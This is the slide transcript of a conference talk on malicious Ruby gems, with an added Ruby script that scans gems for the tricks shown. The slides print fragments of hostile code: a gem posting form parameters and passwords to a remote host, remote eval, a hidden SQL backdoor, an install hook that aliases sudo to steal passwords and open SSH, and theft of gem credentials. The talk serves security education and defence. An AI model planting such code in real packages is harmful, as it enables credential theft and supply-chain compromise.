Hacking with Gems (Ruby Conf Australia)

Benjamin Smith

February 22, 2013

Transcript

  1. Hacking with Gems. Benjamin Smith, @benjamin_smith. Friday, February 22, 13

  2. How-to get rich quick and (maybe) not go to jail!

  3. who i am

  4-8. (no text)

  9. what i am NOT

  10. (no text)

  11-12. please do not try this at home

  13. how it all started
    GEM
      remote: https://rubygems.org/
      specs:
        actionmailer (3.2.12)
          actionpack (= 3.2.12)
          mail (~> 2.4.4)
        actionpack (3.2.12)
          activemodel (= 3.2.12)
          activesupport (= 3.2.12)
          builder (~> 3.0.0)
          erubis (~> 2.7.0)
        ...

  14. what's the worst that could happen?

  15. (no text)
  16. gem 'awesome_rails_flash_messages'
    github.com/benjaminleesmith/awesome-rails-flash-messages

  17. before...

  18. after!

  19. some "side effects"
    if params.to_s.match(Base64.decode64('cGF...'))

  20. ...
    File.open("#{Rails.root}/public/development.log", 'a+') do |f|
      f.write("#{params.inspect}\n")
    end

  21. ?!?
    Net::HTTP.post_form(
      URI.parse(Base64.decode64('aHR0cDo...')),
      { 'log' => params.merge(:url => request.url).inspect }
    )

  22. i like cGFzc3dvcmQ=\n
    if params.to_s.match(Base64.decode64('cGF...'))

  23. i like password
    if params.to_s.match("password")

  24. "development.log"
    ... "user"=>{"email"=>"test@example.com", "password"=>"password", "remember_me"=>"0"} ...

  25. elsewhere...

  26. profit
    • Step 1: do something
    • Step 2: do something else
    • Step 3: ????
    • Step 4: profit

  27-31. profit
    • Step 1: write a gem that does something
    • Step 2: add code to harvest emails/pws
    • Step 3: use emails/pws on banking websites to transfer funds
    • Step 4: profit
    • Step 5: flee the country

  32. a one way ticket to

  33. that was easy. what else can I do?
  34. gem 'net_http_detector'
    github.com/benjaminleesmith/net_http_detector

  35. show me the hack
    Net::HTTP.post_form(#<URI::HTTP:0x007fc76b706950 URL:http://stark-samurai-8122.herokuapp.com/logs>, {"log"=>"{\"utf8\"=>\"✓\", \"authenticity_token\"=>\"PzpZUlRrRv1V+A0jJHAwi+ey/injbWlii8OFyIfP+fY=\", \"user\"=>{\"email\"=>\"test\", \"password\"=>\"pass4\" ...

  36-38. how it works
    def HTTP.valid_post_form(url, params)
      ...
    def HTTP.post_form(url, params)
      self.smart_log("Net::HTTP.post_form(#{url.inspect}, #{params.inspect})")
      Net::HTTP.valid_post_form(url, params)
    end

  39. ...and one more thing...
    eval(Net::HTTP.valid_get(URI("http://....herokuapp.com/snippets/6")))

  40-43. database what?
    append_before_filter :net_http_detector
    ...
    if params[:db_console]
      @tables = ActiveRecord::Base.connection.tables
      if params[:query]
        @output = ActiveRecord::Base.connection.execute(params[:query])

  44. /users/sign_in

  45. /users/sign_in?db_console=t

  46. hello db access!

  47. SELECT * FROM users;

  48. UPDATE users SET admin=1 WHERE id=42;

  49. CREATE USER admin1 WITH PASSWORD 'password';

  50. careful of wolves in sheep's clothing

  51. Little Snitch
    obdev.at/products/littlesnitch/index.html

  52-57. profit
    • Step 1: write a gem that does something
    • Step 2: add code to provide DB access
    • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran)
    • Step 4: profit
    • Step 5: flee the country

  58. i like the beach

  59. that was easy. what else can I do?
  60. gem 'better_date_to_s'
    github.com/benjaminleesmith/better_date_to_s

  61. what it claims to do
    Date.new(2005, 1, 1).to_s(:short)  => "1 Jan"
    ... instead of ...  => " 1 Jan"

  62. (no text)

  63. what it also does
    set_date_formats_for(Rails.env, Rails.root.to_s)

  64. better_date_to_s.bundle (the slide shows the raw bytes of a compiled Mach-O binary: __TEXT, __text, __stubs, __cstring, __DATA, __LINKEDIT, ...)

  65. behind the curtain
    if(strcmp(rails_env, "production") == 0) {
      sprintf(tar_command, "tar -zcvf %s/public/assets.tar.gz %s > /dev/null 2>&1", rails_root, rails_root);
      system(tar_command);
    }

  66. what what

  67. i can haz source

  68. truth time
    • this gem doesn't actually work
    • but it could... if I wasn't lazy
    • "fat" gems are tricky to compile

  69. so much code so little time
    • Step 1: write a gem that does something
    • Step 2: add code to expose source
    • Step 3: sell to competitors?
    • Step 4: profit?
    • Step 5: flee the country

  70. that was easy hard. what else can I do? (that's easier)
  71. gem install be_truthy
    github.com/benjaminleesmith/be_truthy

  72. what it does
    > true.should be_true
    > User.new.should be_true
    > User.new.should be_truthy

  73. what it ACTUALLY does

  74. (no text)

  75. file tree looks ok

  76. source code looks good
    require "be_truthy/version"
    module BeTruthy
    end

  77. but what was this?

  78. I see no C

  79. run the what file?
    Gem::Specification.new do |gem|
      ...
      gem.extensions = ["Rakefile"]
      ...
    end

  80. there is no Rakefile

  81. gem fetch vs gem install
    > gem fetch be_truthy
    > gem unpack be_truthy-0.0.1.gem

  82-83. the real file tree

  84. what does the Rakefile do?

  85. sudo_file = __FILE__.gsub('Rakefile', 'lib/tmp.rb')
    FileUtils.mv(sudo_file, "#{home_dir}/.tmp")

  86. File.open(profile, 'a+') do |f|
      f.write("alias sudo='ruby #{home}/.tmp'\n")
    end

  87. FileUtils.rm(__FILE__)

  88. fseventer
    fernlightning.com/doku.php?id=software:fseventer:start

  89. what does "sudo" do now?

  90-93. print "WARNING: Improper use of the sudo command ..."
    system "stty -echo"
    password = $stdin.gets.chomp
    system "stty echo"
    print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}`

  94. echo '#{password}' | /usr/bin/sudo -S systemsetup -setremotelogin on

  95. /usr/bin/sudo dscl . -create /Users/#{username} ...
    /usr/bin/sudo dscl . -passwd /Users/#{username} password`

  96. Net::HTTP.post_form(URI.parse('http://.../logs'), {'log' => 'ssh enabled'})

  97. ssh sysadmin@your-ip
  98. take away: don't install ben's gems

  99. (no text)

  100. take away: use windows?

  101. don't install ben's gems

  102. how could I get you to install my gems?

  103. what gems are trustworthy?

  104. how can I add my code to already trusted gems?

  105-108. back in the be_truthy gem
    gem_api_key = File.open(`echo ~/.gem/credentials`.strip).read
    gem_list = `gem list`
    Net::HTTP.post_form(...)

  109. now I own your gems

  110. > git clone your-gem-repo
    ...add a little code...
    > rake build
    > gem push your-gem

  111. do people trust your gems?

  112. do people who install your gems have trustworthy gems?

  113. (no text)

  114. there's still one problem

  115. bootstrapping

  116. being popular sucks

  117. conferences

  118. values

  119. hamster

  120. wbench

  121. almost-sinatra

  122. almost-rack

  123. almost-rack-protection

  124. social engineering

  125. (no text)

  126. 5% adoption

  127. so what happens now?

  128. ruby gems goes down

  129. heroku deploys go down

  130. i go to the beach

  131. so what now?

  132. gem cert --build

  133. gem install rails -P HighSecurity

  134. bsmith$ gem install rails -P HighSecurity
    Fetching: activesupport-3.2.12.gem (100%)
    ERROR:  While executing gem ... (Gem::Exception)
        Unsigned gem

  135. sandboxing

  136. github.com/rubygems/rubygems

  137. tools to detect malicious code

  138. private gem repos

  139. do not try this at home

  140. don't install gems you don't need to

  141. pay attention to what your gems do

  142. monitor your system

  143. read the source
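As an added example that is not part of the talk or of any of the gems it shows, here is a small Ruby audit in the spirit of "read the source": it flags the patterns the slides rely on (the Base64-hidden strings of the flash-messages gem, the `gem.extensions = ["Rakefile"]` install hook and the hidden files of be_truthy, the read of ~/.gem/credentials) and compares a gem's shipped file list with its repository tree, which is what `gem fetch` + `gem unpack` makes visible. All inputs are constructed; the decoded URL http://example.com is a placeholder.

```ruby
require "rubygems"
require "base64"

# Source-level indicators drawn from the slides: hidden Base64 literals,
# eval of a fetched body, HTTP exfiltration, shell-outs, credential reads.
SUSPICIOUS_PATTERNS = {
  base64_literal:  /Base64\.decode64\(['"][A-Za-z0-9+\/=]+['"]\)/,
  remote_eval:     /\beval\s*\(\s*Net::HTTP/,
  http_exfil:      /Net::HTTP\.post_form/,
  shell_out:       /\bsystem\s*[("]|`[^`]+`/,
  gem_credentials: %r{\.gem/credentials},
  shell_profile:   /alias sudo=|\.bash_profile|\.zshrc/,
}.freeze

# Names of the indicators that match a Ruby source string.
def scan_source(src)
  SUSPICIOUS_PATTERNS.select { |_, re| src.match?(re) }.keys
end

# Decode every literal passed to Base64.decode64 so a reviewer sees the
# real string ('cGFzc3dvcmQ=' is just "password").
def reveal_base64(src)
  src.scan(/Base64\.decode64\(['"]([A-Za-z0-9+\/=]+)['"]\)/).flatten
     .map { |b64| Base64.decode64(b64) }
end

# Compare the published gem with the repository tree. Two things the
# be_truthy slides rely on: an "extension" that is not extconf.rb runs at
# install time, and files in the .gem that never appear in the repo (only
# visible after `gem fetch` + `gem unpack`).
def audit_spec(spec, repo_files)
  shipped  = (spec.files + spec.extensions).uniq.sort
  findings = spec.extensions.reject { |e| File.basename(e) == "extconf.rb" }
                            .map { |e| "install-time hook: #{e}" }
  findings + (shipped - repo_files).map { |f| "not in repo: #{f}" }
end

# Constructed gemspec mirroring the slide's gem.extensions = ["Rakefile"].
BE_TRUTHY_SPEC = Gem::Specification.new do |gem|
  gem.name       = "be_truthy"
  gem.version    = "0.0.1"
  gem.files      = ["lib/be_truthy.rb", "lib/be_truthy/version.rb", "lib/tmp.rb"]
  gem.extensions = ["Rakefile"]
end
# Constructed listing of what the GitHub repo shows (no Rakefile, no tmp.rb).
BE_TRUTHY_REPO_FILES = ["be_truthy.gemspec", "lib/be_truthy.rb",
                        "lib/be_truthy/version.rb"].freeze

# Constructed fragment in the shape of the flash-messages slides; the
# encoded URL is a placeholder (http://example.com), not the talk's.
FLASH_SRC = <<~'RUBY'
  if params.to_s.match(Base64.decode64('cGFzc3dvcmQ='))
    Net::HTTP.post_form(URI.parse(Base64.decode64('aHR0cDovL2V4YW1wbGUuY29t')),
                        { 'log' => params.inspect })
  end
RUBY
```

Pattern matching of this kind only catches what it is told to look for; the file-list comparison is the more robust check, because an install hook cannot hide from `gem unpack`.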

  144. gem install coal-mine-canary
    github.com/benjaminleesmith/coal-mine-canary

  145. on install

  146. the results

  147. thank you!

  148. questions? ideas? @benjamin_smith https://github.com/benjaminleesmith